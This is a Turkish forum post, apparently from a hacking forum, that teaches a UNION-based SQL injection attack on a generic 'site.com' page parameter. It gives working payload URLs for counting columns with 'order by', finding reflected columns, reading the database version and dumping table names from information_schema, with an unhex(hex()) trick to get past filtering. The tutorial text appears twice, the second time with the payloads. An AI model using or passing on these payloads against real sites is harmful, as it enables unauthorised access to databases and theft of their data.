SQL İnjection Bypass Yöntemi (UNHEX) ;
Merhaba arkadaşlar bu konumda UNHEX sayesinde tablolara nasıl ulaşabileceğimizi anlatacağım.
Herzamanki gibi me ta-Karakterimizi sorguluyoruz sitemizde "'a" eğer varsa devam ediyoruz.
Şimdi ilk işimiz her zaman ki gibi arkadaşlar "order+by+10" komutumuz kolon sayımızı arıyoruz arkadaşlar.
yapıyoruz ve ekranımız normal
yapıyoruz hatamız ekrana gelmiyor fakat şunu görüyoruz sayfada bir değişiklik var arkadaşlar yani anlıyoruz ki
kolon sayımız "10" dur . Şimdi devam ediyoruz arkadaşlar. Her zaman ki gibi "union select" komutumuzla devam ediyoruz ;
komutunu uyguluyoruz ve değerleri ekrana almaya çalışıyoruz.
Şimdi ekrana değerlerimizi yansıttı arkadaşlar ;
"2 , 3 , 6" Biz 2'den devam ediyoruz arkadaşlar .
komutunu uygulayıp çekiyoruz ve sitenin versiyonunu gösterdi şimdi işimize dönüyoruz ve
tabloları çekmeye çalışıyoruz arkadaşlar ;
komutunu uyguladığımız
taktirde normalde bize hata vermeyip normal bir şekilde devam etmemiz lazımdı fakat görüyoruz ki ekrana hiçbir değer yada tablo isimleri gelmemektedir.
Burada arkadaşlar yaygın olarak kullanılan şu yöntemi uyguluyoruz. "UNHEX" Yöntemini kullanarak devam ediyoruz arkadaşlar ;
komutunu uyguladığımız
taktide görüyoruz ki arkadaşlar tablolarımız ekrana yansıdı şimdi gerisi pek de zor değil artık arkadaşlar ;
eğer ki tabloları yan yana hepsini göremiyorsanız sayfa kaynak kodunu görüntüleyebilirsiniz. Yada çift tıklayarak copy / paste uygularak görebiliyoruz vede şöyle bir yöntemi de var arkadaşlar.
komutunu uyguladığımız
taktirde tablolar alt alta sıralanır arkadaşlar.
Bu konumda sonra ermiştir arkadaşlar. UNHEX Bypass yönteminden bahsettim.
Selametle kalın arkadaşlar..
Merhaba arkadaşlar bu konumda UNHEX sayesinde tablolara nasıl ulaşabileceğimizi anlatacağım.
Herzamanki gibi me ta-Karakterimizi sorguluyoruz sitemizde "'a" eğer varsa devam ediyoruz.
Şimdi ilk işimiz her zaman ki gibi arkadaşlar "order+by+10" komutumuz kolon sayımızı arıyoruz arkadaşlar.
Kod:
"site.com/index.php?id=1521 order by 9"
Kod:
"site.com/index.php?id=1521 order by 10"kolon sayımız "10" dur . Şimdi devam ediyoruz arkadaşlar. Her zaman ki gibi "union select" komutumuzla devam ediyoruz ;
Kod:
"site.com/index.php?id=1521 union select 1,2,3,4,5,6,7,8,9,10"Şimdi ekrana değerlerimizi yansıttı arkadaşlar ;
"2 , 3 , 6" Biz 2'den devam ediyoruz arkadaşlar .
Kod:
"site.com/index.php?id=1521 union select 1,version(),3,4,5,6,7,8,9,10"tabloları çekmeye çalışıyoruz arkadaşlar ;
Kod:
"site.com/index.php?id=1521 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()"taktirde normalde bize hata vermeyip normal bir şekilde devam etmemiz lazımdı fakat görüyoruz ki ekrana hiçbir değer yada tablo isimleri gelmemektedir.
Burada arkadaşlar yaygın olarak kullanılan şu yöntemi uyguluyoruz. "UNHEX" Yöntemini kullanarak devam ediyoruz arkadaşlar ;
Kod:
"site.com/index.php?id=1521 union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()"taktide görüyoruz ki arkadaşlar tablolarımız ekrana yansıdı şimdi gerisi pek de zor değil artık arkadaşlar ;
eğer ki tabloları yan yana hepsini göremiyorsanız sayfa kaynak kodunu görüntüleyebilirsiniz. Yada çift tıklayarak copy / paste uygularak görebiliyoruz vede şöyle bir yöntemi de var arkadaşlar.
Kod:
"site.com/index.php?id=1521 union select 1,unhex(hex(group_concat(table_name,char(60,112,62)))),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()"taktirde tablolar alt alta sıralanır arkadaşlar.
Bu konumda sonra ermiştir arkadaşlar. UNHEX Bypass yönteminden bahsettim.
Selametle kalın arkadaşlar..
Son düzenleme:
